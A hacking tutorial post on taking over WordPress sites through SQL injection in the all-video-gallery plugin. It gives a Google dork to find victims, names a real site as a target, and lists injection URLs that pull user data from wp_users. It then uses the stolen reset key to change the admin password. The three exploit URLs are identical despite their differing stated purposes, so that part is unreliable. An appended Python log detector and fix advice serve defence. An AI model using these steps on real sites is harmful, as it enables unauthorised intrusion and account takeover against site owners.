What is WordPress?
WordPress is a free and open source blogging tool and a content management system (CMS) based on PHP and MySQL. It has many features, including a plug-in architecture and a template system.
WordPress is currently the most popular blogging system in use on the Web. It was first released on May 27, 2003, by founders Matt Mullenweg.
Now let's move on to hacking a website. Here I have used the SQL injection vulnerability in all-video-gallery (a WordPress plugin).
1> First, we will find a target using a Google dork: inurl:all-video-gallery/config.php?vid=
2> Open any website. In my case it's juangrial.com.
3> Now let's do a SQL injection: copy the exploit code, hit Enter, and see the magic.
Exploit Code for finding username & password:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users--
You can also try this one. Both work the same way.
Exploit Code for finding username & email:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users--
4> We got the admin email. Now let's reset the password.
For that, go to http://site.com/wp-admin or https://site.com/wp-login.php
Then click on "Lost Password".
5> Enter the email we got in the earlier steps.
6> Now come back and go to the activation table.
Exploit Code for activation key:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,
39,40,41+from+wp_users--
7> Yeah! We got what we need; now let's change the admin password.
Go to: http://site.com/wp-login.php?action=rp&key=resetkey&login=username
8> Now open http://site.com/wp-admin
and log in with the new password. xD
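From the defender's side, the sequence above (an injected `vid` value, then a password-reset request from the same client) leaves a distinctive trail in web server access logs. The following Python detector is an added example, not part of the original post; it assumes combined-format access logs, and the log lines, function names and placeholder key values are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format). IPs are documentation ranges;
# the plugin directory prefix and the key values are placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2013:10:00:01 +0000] "GET /wp-content/plugins/all-video-gallery/config.php?vid=12 HTTP/1.1" 200 512
203.0.113.9 - - [10/Mar/2013:10:02:11 +0000] "GET /wp-content/plugins/all-video-gallery/config.php?vid=1+union+select+1,2+from+wp_users-- HTTP/1.1" 200 734
203.0.113.9 - - [10/Mar/2013:10:03:40 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
203.0.113.9 - - [10/Mar/2013:10:05:02 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER&login=admin HTTP/1.1" 200 2048
198.51.100.7 - - [10/Mar/2013:10:06:00 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER&login=bob HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def parse(line):
    """Return (client_ip, path, query_dict), or None for unparseable lines."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m.group(3))
    return m.group(1), url.path, parse_qs(url.query, keep_blank_values=True)

def find_reset_chains(log_text):
    """Flag non-integer vid values, then reset requests from the same client."""
    injectors = set()   # clients that sent a vid that is not a plain integer
    findings = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, path, query = rec
        if path.endswith("/all-video-gallery/config.php"):
            vid = query.get("vid", [""])[0]
            if not re.fullmatch(r"[0-9]+", vid):
                injectors.add(ip)
                findings.append((ip, "non-numeric vid"))
        elif path.endswith("/wp-login.php") and ip in injectors:
            action = query.get("action", [""])[0]
            if action in ("lostpassword", "rp"):
                findings.append((ip, "reset after injection: " + action))
    return findings

if __name__ == "__main__":
    for ip, reason in find_reset_chains(SAMPLE_LOG):
        print(ip, reason)
```

A hit on the first rule alone is already worth investigating. The durable fix is on the plugin side, where `vid` should be cast to an integer or bound through a prepared statement before it reaches the query.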